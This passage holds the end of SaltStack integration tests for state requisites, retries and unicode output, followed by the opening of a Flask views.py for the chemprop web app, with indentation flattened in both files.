expected_result_complex = {
'cmd_|-A_|-echo A fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo A fourth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo B first" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo D third" run',
'result': True,
'changes': True},
}
ret = self.run_function('state.sls', mods='requisites.prereq_simple')
self.assertReturnNonEmptySaltType(ret)
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple, result)
# same test, but not using lists in yaml syntax
# TODO: issue #8235, prereq ignored when not used in list syntax
# Currently fails badly with :
# TypeError encountered executing state.sls: string indices must be integers, not str.
#expected_result_simple.pop('cmd_|-I_|-echo I_|-run')
#expected_result_simple.pop('cmd_|-J_|-echo J_|-run')
#ret = self.run_function('state.sls', mods='requisites.prereq_simple_nolist')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result_simple, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple2')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple2, result)
ret = self.run_function('state.sls', mods='requisites.prereq_simple3')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result_simple3, result)
#ret = self.run_function('state.sls', mods='requisites.prereq_error_nolist')
#self.assertEqual(
# ret,
# ['Cannot extend ID Z in "base:requisites.prereq_error_nolist".'
# + ' It is not part of the high state.']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error1')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: A\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_compile_error2')
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(
ret['cmd_|-B_|-echo B_|-run']['comment'],
'The following requisites were not found:\n'
+ ' prereq:\n'
+ ' foobar: C\n'
)
ret = self.run_function('state.sls', mods='requisites.prereq_complex')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_complex, result)
# issue #8210 : prereq recursion undetected
# TODO: this test fails
#ret = self.run_function('state.sls', mods='requisites.prereq_recursion_error')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_recursion_error" ID "B" ID "A"']
#)
ret = self.run_function('state.sls', mods='requisites.prereq_simple_no_state_module')
result = self.normalize_ret(ret)
self.assertEqual(expected_result_simple_no_state_module, result)
def test_infinite_recursion_sls_prereq(self):
ret = self.run_function('state.sls', mods='requisites.prereq_sls_infinite_recursion')
self.assertSaltTrueReturn(ret)
def test_requisites_use(self):
'''
Call sls file containing several use_in and use.
'''
# TODO issue #8235 & #8774 some examples are still commented in the test file
ret = self.run_function('state.sls', mods='requisites.use')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
# TODO: issue #8802 : use recursions undetected
# issue is closed as use does not actually inherit requisites
# if chain-use is added after #8774 resolution theses tests would maybe become useful
#ret = self.run_function('state.sls', mods='requisites.use_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "B" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_recursion2')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion2"'
# + ' ID "C" ID "A"'
#])
#ret = self.run_function('state.sls', mods='requisites.use_auto_recursion')
#self.assertEqual(ret, [
# 'A recursive requisite was found, SLS "requisites.use_recursion"'
# + ' ID "A" ID "A"'
#])
def test_requisites_use_no_state_module(self):
'''
Call sls file containing several use_in and use.
'''
ret = self.run_function('state.sls', mods='requisites.use_no_state_module')
self.assertReturnNonEmptySaltType(ret)
for item, descr in six.iteritems(ret):
self.assertEqual(descr['comment'], 'onlyif condition is false')
def test_get_file_from_env_in_top_match(self):
tgt = os.path.join(TMP, 'prod-cheese-file')
try:
ret = self.run_function(
'state.highstate', minion_tgt='sub_minion'
)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(tgt))
with salt.utils.files.fopen(tgt, 'r') as cheese:
data = salt.utils.stringutils.to_unicode(cheese.read())
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
if os.path.islink(tgt):
os.unlink(tgt)
# onchanges tests
def test_onchanges_requisite(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# First, test the result of the state run when changes are expected to happen
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_multiple(self):
'''
Tests a simple state using the onchanges requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls',
mods='requisites.onchanges_multiple')
# First, test the result of the state run when two changes are expected to happen
test_data = state_run['cmd_|-test_two_changing_states_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when two changes are not expected to happen
test_data = state_run['cmd_|-test_two_non_changing_states_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
# Finally, test the result of the state run when only one of the onchanges requisites changes.
test_data = state_run['cmd_|-test_one_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_in_requisite(self):
'''
Tests a simple state using the onchanges_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_in_simple')
# First, test the result of the state run of when changes are expected to happen
test_data = state_run['cmd_|-test_changes_expected_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when changes are not expected to happen
test_data = state_run['cmd_|-test_changes_not_expected_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because none of the onchanges reqs changed'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immedietly (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attmempt
but never run 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
views.py
|
"""Defines a number of routes/views for the flask app."""
from functools import wraps
import io
import os
import sys
import shutil
from tempfile import TemporaryDirectory, NamedTemporaryFile
import time
from typing import Callable, List, Tuple
import multiprocessing as mp
import zipfile
from flask import json, jsonify, redirect, render_template, request, send_file, send_from_directory, url_for
import numpy as np
from rdkit import Chem
from werkzeug.utils import secure_filename
from chemprop.web.app import app, db
sys.path.append(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from chemprop.args import PredictArgs, TrainArgs
from chemprop.constants import MODEL_FILE_NAME, TRAIN_LOGGER_NAME
from chemprop.data import get_data, get_header, get_smiles, get_task_names, validate_data
from chemprop.train import make_predictions, run_training
from chemprop.utils import create_logger, load_task_names, load_args
TRAINING = 0
PROGRESS = mp.Value('d', 0.0)
def check_not_demo(func: Callable) -> Callable:
"""
View wrapper, which will redirect request to site
homepage if app is run in DEMO mode.
:param func: A view which performs sensitive behavior.
:return: A view with behavior adjusted based on DEMO flag.
"""
@wraps(func)
def decorated_function(*args, **kwargs):
if app.config['DEMO']:
return redirect(url_for('home'))
return func(*args, **kwargs)
return decorated_function
def progress_bar(args: TrainArgs, progress: mp.Value):
"""
Updates a progress bar displayed during training.
:param args: Arguments.
:param progress: The current progress.
"""
# no code to handle crashes in model training yet, though
current_epoch = -1
while current_epoch < args.epochs - 1:
if os.path.exists(os.path.join(args.save_dir, 'verbose.log')):
with open(os.path.join(args.save_dir, 'verbose.log'), 'r') as f:
content = f.read()
if 'Epoch ' + str(current_epoch + 1) in content:
current_epoch += 1
progress.value = (current_epoch + 1) * 100 / args.epochs
else:
pass
time.sleep(0)
def find_unused_path(path: str) -> str:
"""
Given an initial path, finds an unused path by appending different numbers to the filename.
:param path: An initial path.
:return: An unused path.
"""
if not os.path.exists(path):
return path
base_name, ext = os.path.splitext(path)
i = 2
while os.path.exists(path):
path = base_name + str(i) + ext
i += 1
return path
def name_already_exists_message(thing_being_named: str, original_name: str, new_name: str) -> str:
"""
Creates a message about a path already existing and therefore being renamed.
:param thing_being_named: The thing being renamed (ex. Data, Checkpoint).
:param original_name: The original name of the object.
:param new_name: The new name of the object.
:return: A string with a message about the changed name.
"""
return f'{thing_being_named} "{original_name} already exists. ' \
f'Saving to "{new_name}".'
def get_upload_warnings_errors(upload_item: str) -> Tuple[List[str], List[str]]:
"""
Gets any upload warnings passed along in the request.
:param upload_item: The thing being uploaded (ex. Data, Checkpoint).
:return: A tuple with a list of warning messages and a list of error messages.
"""
warnings_raw = request.args.get(f'{upload_item}_upload_warnings')
errors_raw = request.args.get(f'{upload_item}_upload_errors')
warnings = json.loads(warnings_raw) if warnings_raw is not None else None
errors = json.loads(errors_raw) if errors_raw is not None else None
return warnings, errors
def format_float(value: float, precision: int = 4) -> str:
"""
Formats a float value to a specific precision.
:param value: The float value to format.
:param precision: The number of decimal places to use.
:return: A string containing the formatted float.
"""
return f'{value:.{precision}f}'
def format_float_list(array: List[float], precision: int = 4) -> List[str]:
"""
Formats a list of float values to a specific precision.
:param array: A list of float values to format.
:param precision: The number of decimal places to use.
:return: A list of strings containing the formatted floats.
"""
return [format_float(f, precision) for f in array]
@app.route('/receiver', methods=['POST'])
@check_not_demo
def receiver():
"""Receiver monitoring the progress of training."""
return jsonify(progress=PROGRESS.value, training=TRAINING)
@app.route('/')
def home():
"""Renders the home page."""
return render_template('home.html', users=db.get_all_users())
@app.route('/create_user', methods=['GET', 'POST'])
@check_not_demo
def create_user():
"""
If a POST request is made, creates a new user.
Renders the create_user page.
"""
if request.method == 'GET':
return render_template('create_user.html', users=db.get_all_users())
new_name = request.form['newUserName']
if new_name is not None:
db.insert_user(new_name)
return redirect(url_for('create_user'))
